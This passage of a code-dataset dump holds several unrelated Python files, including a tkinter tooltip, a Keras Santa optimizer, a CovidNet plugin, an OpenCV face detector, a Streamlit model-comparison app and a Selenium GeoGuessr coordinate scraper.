__init__(self, widget, text='widget info'):\n \"\"\"\n 引数として与えられたヴィジェットに対して、指定のテキストを\n 適切な位置にツールチップとして配置する。\n また、マウスホバー時とボタン押下時のコールバック関数をバインドし、\n ツールチップとしての機能を実現する。\n\n parameters\n ----------\n widget : \n ツールチップを配置するヴィジェット\n text : str\n ツールチップとして表示するテキスト\n \"\"\"\n self.waittime = 500 # 単位は[ms]\n self.wraplength = 180 # pixels\n self.widget = widget\n self.text = text\n self.widget.bind('', self.enter)\n self.widget.bind('', self.leave)\n self.widget.bind('', self.leave)\n self.id = None\n self.tw = None\n\n def enter(self, event=None):\n self.schedule()\n\n def leave(self, event=None):\n self.unschedule()\n self.hidetip()\n\n def schedule(self):\n self.unschedule()\n self.id = self.widget.after(self.waittime, self.showtip)\n\n def unschedule(self):\n id = self.id\n self.id = None\n if id:\n self.widget.after_cancel(id)\n\n def showtip(self, event=None):\n x = y = 0\n x, y, cx, cy = self.widget.bbox(\"insert\")\n x += self.widget.winfo_rootx() + 25\n y += self.widget.winfo_rooty() + 20\n # トップレベルウィンドウの生成\n self.tw = tk.Toplevel(self.widget)\n # ラベルのみを残し、アプリケーションウィンドウを削除する\n self.tw.wm_overrideredirect(True)\n self.tw.wm_geometry(\"+%d+%d\" % (x, y))\n label = tk.Label(self.tw,\n text=self.text,\n justify='left',\n background='#ffffff',\n relief='solid',\n borderwidth=1,\n wraplength=self.wraplength)\n label.pack(ipadx=1)\n\n def hidetip(self):\n tw = self.tw\n self.tw = None\n if tw:\n tw.destroy()\n","sub_path":"tkinter_gui.py","file_name":"tkinter_gui.py","file_ext":"py","file_size_in_byte":11869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"370264276","text":"# Chemcleaner script - Firmenich Project\n\nfrom sys import *\nfrom os import *\nfrom os.path import *\nfrom ChemScript11 import *\nEnv.setVerbosity(False)\n\nregmol = Mol()\n\nif readfromwebserver == 1:\n regmol.readData(InputBase64)\n regmol.cleanupStructure()\n InputBase64 = regmol.cdx(True)\nelse:\n ## if not passed single molecule (i.e. in Debug mode, read SD file to clean, and generate SD output\n if not exists('Output'):\n mkdir('Output')\n # Make an SD reader object for the output file\n regreader1 = SDFileReader('./Output/Transformed_output.sdf') \n # Make an SD writer\n writer2 = SDFileWriter('./Output/Cleaned_output.sdf', False)\n\n #initialise variables\n regmol = Mol()\n structurenum = 0\n # Read the input SD file\n while regreader1.readNext() != None:\n structurenum += 1 \n regmol = regreader1.current()\n #clean up structure\n regmol.cleanupStructure()\n #status_string = status_string +'RECORD ' + str(structurenum )+ ' CLEANED ' \n writer2.writeMol(regmol)\n regreader1.close()\n writer2.close()\n \n \n","sub_path":"subprojects/Classic/Chem_Reg/ChemScript/CleanScript.py","file_name":"CleanScript.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"503256897","text":"# -*- coding: utf-8 -*-\n\nfrom module import Module\nfrom module import ModuleBuilder\n\nclass Output(Module):\n fields = []\n def __init__(self, setting, context=None):\n super(Output, self).__init__(setting, context)\n fields = setting.find('fields')\n if fields is not None:\n for field_setting in fields:\n self.fields.append(self.OutputField(field_setting))\n \n def execute(self, page=0, context=None):\n if self.fields:\n for item in context.items:\n field_names = [x.name for x in self.fields]\n field_names.append('_id') # 如果已经指定_id 则保留\n for field in self.fields:\n try:\n item[field.name] = item[field.name]\n except KeyError:\n item[field.name] = ''\n for key in item.keys():\n if key not in field_names:\n del item[key]\n else:\n for item in context.items:\n for key in item.keys():\n item[key] = item[key]\n pass\n \n class OutputField():\n name = None\n def __init__(self, setting):\n self.name = setting.get('name')\n \nclass OutputBuilder(ModuleBuilder):\n def build(self, module_config, context=None):\n return Output(module_config, context)","sub_path":"feedin/modules/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"529069152","text":"import PyCore\nimport PyDataProcess\nimport copy\n# Your imports below\nimport os\nimport cv2\nimport CovidNet_inference\n\n\n# --------------------\n# - Class to handle the process parameters\n# - Inherits PyCore.CProtocolTaskParam from Ikomia API\n# --------------------\nclass CovidNetParam(PyCore.CProtocolTaskParam):\n\n def __init__(self):\n PyCore.CProtocolTaskParam.__init__(self)\n # Place default value initialization here\n self.model_path = os.path.dirname(os.path.realpath(__file__)) + \"/models/covid-net.pb\"\n\n def setParamMap(self, paramMap):\n # Set parameters values from Ikomia application\n # Parameters values are stored as string and accessible like a python dict\n # Example : self.windowSize = int(paramMap[\"windowSize\"])\n pass\n\n def getParamMap(self):\n # Send parameters values to Ikomia application\n # Create the specific dict structure (string container)\n paramMap = PyCore.ParamMap()\n # Example : paramMap[\"windowSize\"] = str(self.windowSize)\n return paramMap\n\n\n# --------------------\n# - Class which implements the process\n# - Inherits PyCore.CProtocolTask or derived from Ikomia API\n# --------------------\nclass CovidNetProcess(PyDataProcess.CImageProcess2d):\n\n def __init__(self, name, param):\n PyDataProcess.CImageProcess2d.__init__(self, name)\n # Add graphics output\n self.addOutput(PyCore.CGraphicsOutput())\n # Add numeric output\n self.addOutput(PyCore.CDblFeatureIO())\n\n # Create parameters class\n if param is None:\n self.setParam(CovidNetParam())\n else:\n self.setParam(copy.deepcopy(param))\n\n param = self.getParam()\n self.covid_model = CovidNet_inference.Covidnet(model_path=param.model_path)\n\n # Load class names\n self.class_names = []\n class_names_path = os.path.dirname(os.path.realpath(__file__)) + \"/models/class_names\"\n\n with open(class_names_path) as f:\n for row in f:\n self.class_names.append(row[:-1])\n\n def getProgressSteps(self, eltCount=1):\n # Function returning the number of progress steps for this process\n # This is handled by the main progress bar of Ikomia application\n return 3\n\n def run(self):\n # Core function of your process\n # Call beginTaskRun for initialization\n self.beginTaskRun()\n\n # Forward input image\n self.forwardInputImage(0, 0)\n\n # Get input :\n input_img = self.getInput(0)\n src_image = input_img.getImage()\n\n if src_image.ndim == 2:\n color_image = cv2.cvtColor(src_image, cv2.COLOR_GRAY2RGB)\n else:\n color_image = src_image\n\n h = color_image.shape[0]\n w = color_image.shape[1]\n\n # Step progress bar:\n self.emitStepProgress()\n \n # Run prediction\n prediction = self.covid_model.predict(color_image)\n\n # Step progress bar:\n self.emitStepProgress()\n\n # Set graphics output\n graphics_output = self.getOutput(1)\n graphics_output.setNewLayer(\"CovidNet\")\n graphics_output.setImageIndex(0)\n class_index = prediction.argmax(axis=1)[0]\n msg = self.class_names[class_index] + \": {:.3f}\".format(prediction[0][class_index]) \n graphics_output.addText(msg, 0.05*w, 0.05*h)\n\n # Init numeric output\n numeric_ouput = self.getOutput(2)\n numeric_ouput.clearData()\n numeric_ouput.setOutputType(PyCore.NumericOutputType.TABLE)\n numeric_ouput.addValueList(prediction.flatten().tolist(), \"Probability\", self.class_names)\n \n # Step progress bar:\n self.emitStepProgress()\n\n # Call endTaskRun to finalize process\n self.endTaskRun()\n\n\n# --------------------\n# - Factory class to build process object\n# - Inherits PyDataProcess.CProcessFactory from Ikomia API\n# --------------------\nclass CovidNetProcessFactory(PyDataProcess.CProcessFactory):\n\n def __init__(self):\n PyDataProcess.CProcessFactory.__init__(self)\n # Set process information as string here\n self.info.name = \"CovidNet\"\n self.info.shortDescription = \"A tailored Deep Convolutional Neural Network Design \" \\\n \"for detection of COVID-19 cases from chest radiography images.\"\n self.info.description = \"The COVID-19 pandemic continues to have a devastating effect on the health \" \\\n \"and well-being of the global population. A critical step in the fight against \" \\\n \"COVID-19 is effective screening of infected patients, with one of the key screening \" \\\n \"approaches being radiological imaging using chest radiography. It was found in early \" \\\n \"studies that patients present abnormalities in chest radiography images that are characteristic \" \\\n \"of those infected with COVID-19. Motivated by this, a number of artificial intelligence (AI) \" \\\n \"systems based on deep learning have been proposed and results have been shown to be quite promising \" \\\n \"in terms of accuracy in detecting patients infected with COVID-19 using chest radiography images. \" \\\n \"However, to the best of the authors’ knowledge, these developed AI systems have been closed source \" \\\n \"and unavailable to the research community for deeper understanding and extension, and unavailable \" \\\n \"for public access and use. Therefore, in this study we introduce COVID-Net, a deep convolutional \" \\\n \"neural network design tailored for the detection of COVID-19 cases from chest radiography images \" \\\n \"that is open source and available to the general public. We also describe the chest radiography dataset \" \\\n \"leveraged to train COVID-Net, which we will refer to as COVIDx and is comprised of 16,756 chest \" \\\n \"radiography images across 13,645 patient cases from two open access data repositories. \" \\\n \"Furthermore, we investigate how COVID-Net makes predictions using an explainability method \" \\\n \"in an attempt to gain deeper insights into critical factors associated with COVID cases, \" \\\n \"which can aid clinicians in improved screening. By no means a production-ready solution, \" \\\n \"the hope is that the open access COVID-Net, along with the description on constructing \" \\\n \"the open source COVIDx dataset, will be leveraged and build upon by both researchers and \" \\\n \"citizen data scientists alike to accelerate the development of highly accurate yet practical \" \\\n \"deep learning solutions for detecting COVID-19 cases and accelerate treatment of those \" \\\n \"who need it the most.\"\n # relative path -> as displayed in Ikomia application process tree\n self.info.path = \"Plugins/Python/Detection\"\n self.info.version = \"1.0.0\"\n self.info.iconPath = \"icon/icon.png\"\n self.info.authors = \"Linda Wang, Alexander Wong\"\n self.info.article = \"COVID-Net: A Tailored Deep Convolutional Neural Network Design for Detection \" \\\n \"of COVID-19 Cases from Chest Radiography Images\"\n self.info.journal = \"\"\n self.info.year = 2020\n self.info.license = \"GNU Affero General Public License 3.0.\"\n self.info.documentationLink = \"https://arxiv.org/pdf/2003.09871.pdf\"\n self.info.repository = \"https://github.com/lindawangg/COVID-Net\"\n self.info.keywords = \"covid-19,coronavirus,x-ray,radiography,chest,lung,dnn\"\n\n\n def create(self, param=None):\n # Create process object\n return CovidNetProcess(self.info.name, param)\n","sub_path":"CovidNet/CovidNet_process.py","file_name":"CovidNet_process.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"602714456","text":"from keras.optimizers import Optimizer\nimport keras.backend as K\nfrom keras.legacy import interfaces\n\n\nclass Santa(Optimizer):\n \"\"\"\n Euler implementation of Santa optimization algorithm,\n Adapted from theano implementation of authors\n \"\"\"\n\n def __init__(self, lr, exploration, rho=0.95,\n anne_rate=0.5, epsilon=1e-8, **kwargs):\n # default value for clipping is 'clip_norm = 5'\n if 'clipnorm' not in kwargs and 'clipvalue' not in kwargs:\n kwargs['clipnorm'] = 5\n\n super(Santa, self).__init__(**kwargs)\n with K.name_scope(self.__class__.__name__):\n self.iterations = K.variable(0, dtype='float32', name='iterations')\n self.lr = K.variable(lr, name='lr')\n\n self.exploration = K.variable(exploration, name='exploration', dtype='float32')\n\n # anne_rate -> η\n self.anne_rate = K.variable(anne_rate, name='anne_rate')\n if epsilon is None:\n epsilon = K.epsilon()\n self.epsilon = epsilon\n # rho -> σ\n self.rho = rho\n\n @interfaces.legacy_get_updates_support\n def get_updates(self, loss, params):\n # grads -> f_tilda\n grads = self.get_gradients(loss, params)\n\n ###\n ### Removed part seems to be related theano specifically\n ###\n\n # i = theano.shared(numpy_floatX(0.))\n i_t = self.iterations + 1\n\n # Exploration condition (CHANGED!)\n should_explore = K.cast(K.less(i_t, self.exploration), K.floatx())\n\n # Inverse temperature β\n b_t = K.pow(i_t, self.anne_rate)\n\n ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]\n vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]\n als = [K.ones(K.int_shape(p), dtype=K.dtype(p)) * .5 for p in params]\n\n for p, g, m, v, a in zip(params, grads, ms, vs, als):\n # m = K.variable(p.get_value() * 0.)\n # v = K.variable(p.get_value() * 0.)\n # alpha = K.variable(K.ones(p.get_value().shape) * .5)\n\n # In Exploitation value is not updated, (1 / 2) not found?\n a_t = a + should_explore * (K.pow(m, 2) - self.lr / b_t)\n\n # (1 / N^2) not found? (probably normalization factor...)\n v_t = self.rho * v + (1. - self.rho) * K.pow(g, 2)\n\n # pcder -> 1 / g_t\n pcder = K.sqrt(K.sqrt(v_t) + self.epsilon)\n\n # eps -> ζ : standard normal random vector\n # eps = K.random_normal(p.get_value().shape, mean=0.0, stddev=1.0)\n eps = K.random_normal(K.int_shape(p), mean=0.0, stddev=1.0)\n\n # m_t -> u_t\n # (1 - g_t-1 / g_t) term omitted for complexity\n # g_t-1 term is replaced with a (not constant?!) self.nframes\n # 1 instead of (v_t / self.nframes) since it can be constant\n m_t = (1. - a_t) * m - self.lr * g / pcder + should_explore * \\\n K.sqrt((2 * self.lr / b_t) * v_t) * eps\n\n # p_t -> θ_t\n p_t = p + m_t / pcder\n\n self.updates.append(K.update(m, m_t))\n self.updates.append(K.update(v, v_t))\n self.updates.append(K.update(p, p_t))\n # self.updates.append(K.update(a, a_t))\n # Adam implementation did not updated iteration...\n # self.updates.append(K.update(i, i_t))\n\n return self.updates\n\n def get_config(self):\n # lr, exploration, rho=0.95,\n # anne_rate=0.5, epsilon=1e-8\n config = {\n 'lr': float(K.get_value(self.lr)),\n 'exploration': int(K.get_value(self.exploration)),\n 'rho': self.rho,\n 'anne_rate': float(K.get_value(self.anne_rate)),\n 'epsilon': self.epsilon\n }\n # clip_norm=5\n base_config = super(Santa, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n","sub_path":"Santa.py","file_name":"Santa.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"437839572","text":"#!/usr/bin/python2\nimport sys\nimport cv2\nimport numpy\n\n# Get user supplied values\ncascPath = sys.argv[1]\n\n# Create the haar cascade\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\n# Read the image\nvideo_capture = cv2.VideoCapture(0)\nret, image = video_capture.read()\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n# Detect faces in the image\nfaces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(30, 30),\n flags = cv2.CASCADE_SCALE_IMAGE\n)\n\n#print \"Found {0} faces!\".format(len(faces))\n\n# Draw a rectangle around the faces\nfor (x, y, w, h) in faces:\n cv2.rectangle(image, (x, y), (x+w, y+h), (255, 36, 36), 5)\n\ncv2.imwrite(\"processed_shot.jpg\", image)\n\ncv2.waitKey(0)\n","sub_path":"face_detect.py","file_name":"face_detect.py","file_ext":"py","file_size_in_byte":722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80009903","text":"'''\nConsider that the human tower is to be performed on a stage and the stage has a maximum weight limit.\n\nWrite a python program to find the maximum number of people at the base level such that the total weight of tower does not exceed the maximum weight limit of the stage.\n\nAssume that:\n1. Each person weighs 50 kg\n2. There will always be odd number of men at the base level of the human tower.\n'''\n\n# Solution\n\n#PF-Exer-32\n\ndef human_pyramid(no_of_people):\n if(no_of_people==1):\n return 1*(50)\n else:\n return no_of_people*(50)+human_pyramid(no_of_people-2)\n \ndef find_maximum_people(max_weight):\n no_of_people=1\n while human_pyramid(no_of_people) <= max_weight :\n human_pyramid(no_of_people)\n no_of_people += 2 \n #write your logic here. You may invoke recursive function human_pyramid() wherever applicable \n return no_of_people-2\n\n#Provide different values for max_weight and test your program\nmax_people=find_maximum_people(1050)\nprint(max_people)\n","sub_path":"Programming Fundamentals using Python/Day 6/Exercises/Exercise 32: Collaborative Exercise - Level 2.py","file_name":"Exercise 32: Collaborative Exercise - Level 2.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"291430574","text":"# Core packages\nimport streamlit as st \n# Images packages\nfrom PIL import Image\n# EDA packages\nimport pandas as pd \nimport numpy as np\n# Data visualisation packages\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport matplotlib\n# Machine Leaning Models\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier\n\nimg = Image.open('mutemaEnterprises.jpg')\nst.set_page_config(page_title='Datasets and Machine Learning Models Analyzer',page_icon = img)\n\ndef main():\n\tdef modelsf():\n\t\tml_models = ['Linear Regression','Logistic Regression','SVM','KNN','Random Forest']\n\t\tselected_model = st.sidebar.selectbox('Machine Learning Models',ml_models)\n\t\tif selected_model == 'Linear Regression':\n\t\t\tst.write('''# Linear Regression''')\n\t\t\ttry:\n\t\t\t\tclf = LinearRegression()\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes, it will give an error please select another algorithm................. \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM')\n\n\t\telif selected_model == 'Logistic Regression':\n\t\t\tst.write('''# Logistic Regression''')\n\t\t\ttry:\n\t\t\t\tclf = LogisticRegression(random_state=rndm_state)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\n\t\n\t\telif selected_model == 'SVM':\n\t\t\tst.write('''# SVM''')\n\t\t\ttry:\n\t\t\t\tC = st.sidebar.slider('C',0.01,10.0)\n\t\t\t\tclf = SVC(C=C)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\n\t\t\t\n\t\telif selected_model == 'KNN':\n\t\t\tst.write('''# KNN''')\n\t\t\ttry:\n\t\t\t\tK = st.sidebar.slider('K',1,15)\n\t\t\t\tclf = KNeighborsClassifier(n_neighbors=K)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\t\n\n\t\telif selected_model == 'Random Forest':\n\t\t\tst.write('''Random Forest''')\n\t\t\ttry:\n\t\t\t\tmax_depth = st.sidebar.slider('max-depth',2,15)\n\t\t\t\tn_estimators = st.sidebar.slider('n_estimators',1,100)\n\t\t\t\tclf = RandomForestClassifier(n_estimators = n_estimators,max_depth = max_depth,random_state=rndm_state)\n\t\t\t\tclf.fit(X_train,y_train)\n\t\t\t\taccuracy = clf.score(X_test,y_test)\n\t\t\t\tst.write('ACCURACY is {}'.format(accuracy))\n\t\t\n\t\t\texcept Exception as e:\n\t\t\t\tst.error(\n\t\t\t\t\t'Selected algorithm does not support inserted dataset \\n'\n\t\t\t\t\t'The data inserted is not compatible with the algorithm selected for example you have selected a regression algorithm '\n\t\t\t\t\t'but your dataset include strings which cannot be parsed to floats or integers thus since the regression algorithm works '\n\t\t\t\t\t'with numbers and not other datatypes it will give an error please select another algorithm.......................... \\n'\n\t\t\t\t\t'PLEASE SELECT ANOTHER ALGORITHM.')\n\n\tdef explanatory_data_analysis():\n\t\t# Show Dataset\n\t\tif st.checkbox('Show Dataset'):\n\t\t\tnumber = st.number_input('Number of rows to view',1)\n\t\t\tst.dataframe(df.head(number))\n\t\tif st.checkbox('Show number of rows and columns'):\n\t\t\tst.write(f'Rows: {df.shape[0]}')\n\t\t\tst.write(f'Columns: {df.shape[1]}')\n\t\t# if st.checkbox('Value Count'):\n\t\tif st.checkbox('Show Value Counts of Target Columns'):\n\t\t\tst.write(df.iloc[:,-1].value_counts())\n\t\t# Show Columns\n\t\tif st.checkbox('Column Labels'):\n\t\t\tst.write(df.columns)\n\t\t# Show Data Types \n\t\tif st.checkbox('Data Types'):\n\t\t\tst.write(df.dtypes)\n\t\t# Selected Columns\n\t\tif st.checkbox('Select multiple colums'):\n\t\t\tall_columns = df.columns.tolist()\n\t\t\tselected_columns = st.multiselect('Select Columns',all_columns)\n\t\t\tselected_columns_df = df[selected_columns]\n\t\t\tif len(selected_columns) > 0:\n\t\t\t\tst.dataframe(selected_columns_df)\n\t\t# Show Summary\n\t\tif st.checkbox('Summary'):\n\t\t\tst.write(df.describe().T)\n\n\n\tdef visualisation():\n\t\t# Plot and Visualisation\n\t\t# Correlation\n\t\t# Seaborn Plot\n\t\tif st.checkbox('Show Correlation Matrix with Heatmap'):\n\t\t\tif st.button('Generate Correlation Matix'):\n\t\t\t\tst.write('### Heatmap')\n\t\t\t\tfig, ax = plt.subplots(figsize=(10,10))\n\t\t\t\tst.write(sns.heatmap(df.corr(), annot=True,linewidths=0.5))\n\t\t\t\tst.pyplot(fig)\n\n\t\t# Pie Chart\n\t\tif st.checkbox('Pie Chart Plot of Target Columns'):\n\t\t\tif st.button('Generate Pie Plot'):\n\t\t\t\tst.success('Generating a Pie Chart Plot')\n\t\t\t\tst.write(df.iloc[:,-1].value_counts().plot.pie(autopct=\"%1.1f%%\"))\n\t\t\t\tst.pyplot()\n\t\t# Customizable Plot\n\t\tplot_types = ['area','bar','line','hist','box','kde']\n\t\ttype_of_plot = st.selectbox('Select Type of Plot',plot_types)\n\t\tall_cols = df.columns.tolist()\n\t\tselected_cols = st.multiselect('Select Columns to Plot',all_cols)\n\t\tcust_data = df[selected_cols]\n\t\tif st.button('Generate Plot'):\n\t\t\tst.success('Generating Plot of {} for the selected columns which are {}'.format(type_of_plot,selected_cols))\n\t\t\tif type_of_plot == 'area':\n\t\t\t\tst.area_chart(cust_data)\n\t\t\telif type_of_plot == 'bar':\n\t\t\t\tst.bar_chart(cust_data)\n\t\t\telif type_of_plot == 'line':\n\t\t\t\tst.line_chart(cust_data)\n\n\t\t\telif type_of_plot:\n\t\t\t\tcust_plot = cust_data.plot(kind = type_of_plot)\n\t\t\t\tst.write(cust_plot)\n\t\t\t\tst.pyplot()\n\n\t\t# Count Plot\t \n\t\tif st.checkbox('Value Counts Plot'):\n\t\t\tst.text('Value Counts by Target')\n\t\t\tall_column_name = df.columns.tolist()\n\t\t\tprimary_col = st.selectbox('Primary Colums to groupby',all_column_name)\t\n\t\t\tselected_column_name = st.multiselect('Select Column',all_column_name)\n\t\t\tif st.button('Generate Value Counts Plot'):\n\t\t\t\tst.success('Generating Plot')\n\t\t\t\tif selected_column_name:\n\t\t\t\t\tvalue_count_plot = df.groupby(primary_col)[selected_column_name].count()\n\t\t\t\telse:\n\t\t\t\t\tvalue_count_plot = df.iloc[:,-1].value_counts()\n\t\t\t\tst.write(value_count_plot.plot(kind = 'bar'))\n\t\t\t\tst.pyplot()\n\n\n\tst.set_option('deprecation.showPyplotGlobalUse', False)\n\tmenu = ['Explanatory Data Analysis','Feature Engineering','Machine Learning Models','About']\n\tchoice = st.sidebar.selectbox('Main Menu',menu)\n\tif choice == 'Explanatory Data Analysis':\n\t\tst.write('''# Explanatory Data Analysis''')\n\t\tfile_formats_types = ['csv','xlsx','json','txt']\n\t\tdatafile_format = st.selectbox('Dataset File Format',file_formats_types)\n\t\tdata_file = st.file_uploader('Upload',type = [datafile_format])\t\n\t\tif data_file is not None:\n\t\t\tif datafile_format == 'csv':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'xlsx':\n\t\t\t\tdf = pd.read_excel(data_file)\n\t\t\telif datafile_format == 'txt':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'json':\n\t\t\t\tdf = pd.read_json(data_file)\n\t\t\telse:\n\t\t\t\tst.info('Invalid Format')\n\t\t\texplanatory_data_analysis()\n\n\telif choice == 'Feature Engineering':\n\t\tst.write('''# Feature Engineering''')\n\t\tfile_formats_types = ['csv','xlsx','json','txt']\n\t\tdatafile_format = st.selectbox('Dataset File Format',file_formats_types)\n\t\tdata_file = st.file_uploader('Upload',type = [datafile_format])\t\n\t\tif data_file is not None:\n\t\t\tif datafile_format == 'csv':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'xlsx':\n\t\t\t\tdf = pd.read_excel(data_file)\n\t\t\telif datafile_format == 'txt':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'json':\n\t\t\t\tdf = pd.read_json(data_file)\n\t\t\telse:\n\t\t\t\tst.info('Invalid Format')\n\t\t\tvisualisation()\n\n\telif choice == 'Machine Learning Models':\n\t\tst.write('''# Machine Learning Models''')\n\t\tfile_formats_types = ['csv','xlsx','json','txt']\n\t\tdatafile_format = st.selectbox('Dataset File Format',file_formats_types)\n\t\tdata_file = st.file_uploader('Upload',type = [datafile_format])\t\n\t\tif data_file is not None:\n\t\t\tif datafile_format == 'csv':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'xlsx':\n\t\t\t\tdf = pd.read_excel(data_file)\n\t\t\telif datafile_format == 'txt':\n\t\t\t\tdf = pd.read_csv(data_file)\n\t\t\telif datafile_format == 'json':\n\t\t\t\tdf = pd.read_json(data_file)\n\t\t\telse:\n\t\t\t\tst.info('Invalid Format')\n\t\t\tX = df.iloc[:,0:-1]\n\t\t\ty = df.iloc[: , -1]\n\t\t\ttst_sz = st.sidebar.slider('Test Size',1,100)\n\t\t\trndm_state = st.sidebar.slider('Random State')\n\t\t\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=tst_sz, random_state=rndm_state)\n\t\t\tmodelsf()\n\n\telif choice == 'About':\n\t\tst.write('''# About''')\n\t\tst.write(\"\"\"\n\t\t# HCT204-Artificial Intelligence CTHSC 2021 Level 2.2 Project\n\n\t\tThis project was developed by Takudzwa Mutema a student at the University of Zimbabwe currently studying Computer\n\t\tScience Degree(CTHSC).This web application helps to automate explanatory data analysis, feature engineering and \n\t\tmachine learning model training returning the accuracy which may help in choosing a more suitable model for a given dataset\n\t\tthus a model that gives more accuracy.The web application was developed using Python.It allows for a user to insert a dataset\n\t\tof format that is accepted by the web app(csv,txt,json,xlsx).After uploading a dataset one can experient with it using different\n\t\tdata analysis supported and Graph ploting. If a dataset is already prepared for training model one can use the web app to find\n\t\twhich model is more appropriate by looking at the accuracy.\n\n\t\t# Below is the Question which the web application tried to answer\n\n\t\tCreate a website using python. The site should provide a platform whereby\n\t\tusers should be able to upload their data sets. State the data formats that you\n\t\tsupport on that site. Lead the user through a tutorial process whereby a user is\n\t\tsupposed to do Exploratory data analysis and feature engineering. After the\n\t\tExploratory Data analysis and feature engineering stage, the user is supposed\n\t\tto pick any one of the machine learning models that you support on your\n\t\tplatform. If a user picks a wrong machine learning model the system should\n\t\tgive an informative response. The user must also be given a choice to compare\n\t\taccuracy\n\n\t\temail-takudzwamutema5@gmail.com\n\t\t\"\"\")\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":11875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"129081437","text":"from selenium import webdriver\r\nimport time\r\n\r\n\r\ndef GeoCoordinates(URL):\r\n z = 0\r\n try:\r\n while z <= 10:\r\n z += 1\r\n coordinates = []\r\n acoordinates = []\r\n chrome_path = r\"C:\\Users\\Ericlameguy\\Desktop\\chromedriver_win32 (1)\\chromedriver.exe\"\r\n driver = webdriver.Chrome(chrome_path)\r\n driver.get(URL)\r\n html = driver.execute_script(\"return document.documentElement.innerHTML;\")\r\n\r\n newhtml = html.split(\"https://maps.google.com/maps/@\", 1)[1]\r\n coordinates.append(float(newhtml.split(',')[0]))\r\n coordinates.append(float(newhtml.split(',')[1]))\r\n\r\n\r\n print(coordinates)\r\n except IndexError:\r\n print(\"I N D E X ERROR !!! \")\r\n time.sleep(100)\r\n\r\n\r\n\r\nGeoCoordinates(\"https://geoguessr.com/world/play\")","sub_path":"NoHeadless.py","file_name":"NoHeadless.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"166967791","text":"a=0\nfor x in range(1,101):\n a += 